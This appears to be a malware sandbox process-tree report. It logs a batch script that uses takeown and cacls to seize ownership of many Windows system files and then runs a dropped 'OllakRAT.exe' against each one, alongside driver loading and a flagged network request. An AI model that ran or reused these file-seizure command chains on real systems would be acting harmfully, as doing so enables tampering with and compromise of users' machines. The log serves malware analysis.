        PID:2940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "store.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1348
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3848
    - - C:\Users\Admin\AppData\Local\Temp\OllakRAT64.exe
        
        OllakRAT.exe -accepteula "store.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:4476
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:6100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"
    3⤵
    PID:5272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "store.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5700
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:5308
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"
    3⤵
    PID:5740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:6088
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:4416
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""
  2⤵
  PID:6124
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:5324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"
    3⤵
    PID:5448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:1604
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:5152
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:5444
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:6140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    PID:3324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:2300
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:5720
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:2764
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:5116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:5996
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:2580
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:4884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1884
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:5512
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:4572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    PID:5532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2460
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2180
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:4340
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5300
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:5920
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C
    3⤵
    PID:5912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "manifest.json" -nobanner
    3⤵
    - Executes dropped EXE
    PID:3084
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "manifest.json" -nobanner
      4⤵
      PID:5436
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:5640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5372
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    - Executes dropped EXE
    PID:5920
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5164
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:3780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:5240
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:1636
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5532
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:5264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3716
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:6040
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:5916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2460
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5644
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  PID:5888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:5132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wab.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:5344
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "wab.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:3216
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:660
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:5584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4220
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5512
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5308
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:5556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:6112
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5968
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""
  2⤵
  PID:2932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "BrowserCore.exe.mui" -nobanner
    3⤵
    PID:5756
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "BrowserCore.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2404
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:6088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:5780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5680
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4796
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:2072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:5452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:4892
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:4036
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:2380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:5520
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:5332
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""
  2⤵
  PID:4452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C
    3⤵
    PID:3948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "BrowserCore.exe" -nobanner
    3⤵
    PID:1752
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "BrowserCore.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4336
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5144
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  - Blocklisted process makes network request
  PID:3432
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:660
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5988
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5508
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:5448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5308
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4904
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3836
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2688
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:5692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Executes dropped EXE
    PID:5436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3084
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5544
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:4764
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5780
